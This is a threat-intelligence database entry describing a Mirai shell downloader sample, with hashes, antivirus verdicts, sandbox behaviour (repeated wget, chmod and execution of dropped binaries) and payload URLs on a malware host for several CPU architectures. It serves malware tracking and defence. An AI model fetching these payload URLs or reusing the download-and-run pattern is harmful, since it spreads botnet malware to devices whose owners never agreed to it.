MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6
SHA3-384 hash: 1dd27c40e542266ae6091bd07c897e6fdb5f798adb6a09a5669d23d016a87687a84f0a66e03bc9701fe3bf874b83364f
SHA1 hash: e8db329ccd5864b65777e3407e59d169b35e8718
MD5 hash: 88c3d07952a1a26d68ac44bd17e184e8
humanhash: single-ack-minnesota-muppet
File name:tvt.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:883 bytes
First seen:2025-10-31 00:15:31 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 24:ToWBGhBh9Mk8QoWkp+VE+/I/V7nzf5XplHL:ToGGhL8QoWLVE+wV7zfVptL
TLSH T199119999D98197A48456192D71C7C21DF0A3C3EC26E22B08FC4C2E387BCC588F831EB5
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://42.112.26.45/arm18b40a18fe04c05ee7bbdc7a07125633eb803dd7cd9f198e89a2b824df628c5c Miraielf mirai ua-wget
http://42.112.26.45/arm5be61d9c23d4359b4a4d4911f0f8fc09f69124f3cf991856d5c871e23568c5cd2 Miraielf mirai ua-wget
http://42.112.26.45/arm748f8ba323a18feb719e4cba9d502e85a73e89c0e7d4c6a5b2dae7e808b19f692 Miraielf mirai ua-wget
http://42.112.26.45/mips0b92cb77fec808a81df7037d623f112a33c759a5f7cf13681d2ff71c8471fcef Miraielf gafgyt mirai ua-wget
http://42.112.26.45/mpsl6a731d8ed31ee578f3cd6359cf61f1f115284166b35d99cde278241cbba03f37 Gafgytelf gafgyt mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
46
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-36.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-10-30T22:28:00Z UTC
Last seen:
2025-10-31T05:01:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/5cb7af7d-8249-4533-8721-4055d0f22b09
Behavior Graph:
Download SVG
%3 guuid=b7f2a9cc-1700-0000-abab-3f92890b0000 pid=2953 /usr/bin/sudo guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956 /tmp/sample.bin guuid=b7f2a9cc-1700-0000-abab-3f92890b0000 pid=2953->guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956 execve guuid=58ae36d4-1700-0000-abab-3f929e0b0000 pid=2974 /usr/bin/rm guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=58ae36d4-1700-0000-abab-3f929e0b0000 pid=2974 execve guuid=415e72d4-1700-0000-abab-3f92a00b0000 pid=2976 /usr/bin/wget net send-data write-file guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=415e72d4-1700-0000-abab-3f92a00b0000 pid=2976 execve guuid=de638816-1800-0000-abab-3f92260c0000 pid=3110 /usr/bin/chmod guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=de638816-1800-0000-abab-3f92260c0000 pid=3110 execve guuid=2212c516-1800-0000-abab-3f92280c0000 pid=3112 /usr/bin/dash guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=2212c516-1800-0000-abab-3f92280c0000 pid=3112 clone guuid=32816618-1800-0000-abab-3f922f0c0000 pid=3119 /usr/bin/rm guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=32816618-1800-0000-abab-3f922f0c0000 pid=3119 execve guuid=be95e718-1800-0000-abab-3f92310c0000 pid=3121 /usr/bin/wget net send-data write-file guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=be95e718-1800-0000-abab-3f92310c0000 pid=3121 execve guuid=b7750e5d-1800-0000-abab-3f92880c0000 pid=3208 /usr/bin/chmod guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=b7750e5d-1800-0000-abab-3f92880c0000 pid=3208 execve guuid=2f57815d-1800-0000-abab-3f92890c0000 pid=3209 /usr/bin/dash guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=2f57815d-1800-0000-abab-3f92890c0000 pid=3209 clone guuid=fd88735e-1800-0000-abab-3f928b0c0000 pid=3211 /usr/bin/rm guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=fd88735e-1800-0000-abab-3f928b0c0000 pid=3211 execve guuid=ef50545f-1800-0000-abab-3f928c0c0000 pid=3212 /usr/bin/wget net send-data write-file guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=ef50545f-1800-0000-abab-3f928c0c0000 pid=3212 execve guuid=6ac502a0-1800-0000-abab-3f92cf0c0000 pid=3279 /usr/bin/chmod guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=6ac502a0-1800-0000-abab-3f92cf0c0000 pid=3279 execve guuid=d4fe65a0-1800-0000-abab-3f92d10c0000 pid=3281 /usr/bin/dash guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=d4fe65a0-1800-0000-abab-3f92d10c0000 pid=3281 clone guuid=c7bf4ba1-1800-0000-abab-3f92d40c0000 pid=3284 /usr/bin/rm guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=c7bf4ba1-1800-0000-abab-3f92d40c0000 pid=3284 execve guuid=2fb5dda1-1800-0000-abab-3f92d60c0000 pid=3286 /usr/bin/wget net send-data write-file guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=2fb5dda1-1800-0000-abab-3f92d60c0000 pid=3286 execve guuid=067f5fe7-1800-0000-abab-3f92400d0000 pid=3392 /usr/bin/chmod guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=067f5fe7-1800-0000-abab-3f92400d0000 pid=3392 execve guuid=5706c9e7-1800-0000-abab-3f92420d0000 pid=3394 /usr/bin/dash guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=5706c9e7-1800-0000-abab-3f92420d0000 pid=3394 clone guuid=aa277ee8-1800-0000-abab-3f92450d0000 pid=3397 /usr/bin/rm guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=aa277ee8-1800-0000-abab-3f92450d0000 pid=3397 execve guuid=fd5919e9-1800-0000-abab-3f92460d0000 pid=3398 /usr/bin/wget net send-data guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=fd5919e9-1800-0000-abab-3f92460d0000 pid=3398 execve guuid=58109d05-1900-0000-abab-3f92770d0000 pid=3447 /usr/bin/chmod guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=58109d05-1900-0000-abab-3f92770d0000 pid=3447 execve guuid=174e1906-1900-0000-abab-3f92790d0000 pid=3449 /tmp/sdvsdthj guuid=0c31fbce-1700-0000-abab-3f928c0b0000 pid=2956->guuid=174e1906-1900-0000-abab-3f92790d0000 pid=3449 execve 7e1f030a-193f-5ef8-b58f-206d09d04b13 42.112.26.45:80 guuid=415e72d4-1700-0000-abab-3f92a00b0000 pid=2976->7e1f030a-193f-5ef8-b58f-206d09d04b13 send: 130B guuid=be95e718-1800-0000-abab-3f92310c0000 pid=3121->7e1f030a-193f-5ef8-b58f-206d09d04b13 send: 131B guuid=ef50545f-1800-0000-abab-3f928c0c0000 pid=3212->7e1f030a-193f-5ef8-b58f-206d09d04b13 send: 131B guuid=2fb5dda1-1800-0000-abab-3f92d60c0000 pid=3286->7e1f030a-193f-5ef8-b58f-206d09d04b13 send: 131B guuid=fd5919e9-1800-0000-abab-3f92460d0000 pid=3398->7e1f030a-193f-5ef8-b58f-206d09d04b13 send: 131B
Score:
84%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6/
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-10-31 00:16:01 UTC
File Type:
Text (Shell)
AV detection:
13 of 36 (36.11%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=safz5acgmg3nerzbbancxvvcfm2w2wxlxak6alyins6el3p533da._file
Result
Malware family:
n/a
Score:
  9/10
Tags:
antivm credential_access defense_evasion discovery linux
Link:
https://tria.ge/reports/251031-akfj2sej9v/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads process memory
Enumerates running processes
File and Directory Permissions Modification
Executes dropped EXE
Renames itself
Contacts a large (28596) amount of remote hosts
Creates a large amount of network flows
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.31
Link:
https://yomi.yoroi.company/submissions/900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6

(this sample)

Mirai

elf 2be06bd2a4fd732c37e2a576c87608768d2241c23212ed3247c2881fc59e066b

  
URLhaus
https://urlhaus.abuse.ch/url/3680309/
  
Delivery method
Distributed via web download
  
Dropping
MD5 35f2973a70578ed3367878de007d32e3
  
Dropping
SHA256 2be06bd2a4fd732c37e2a576c87608768d2241c23212ed3247c2881fc59e066b

Comments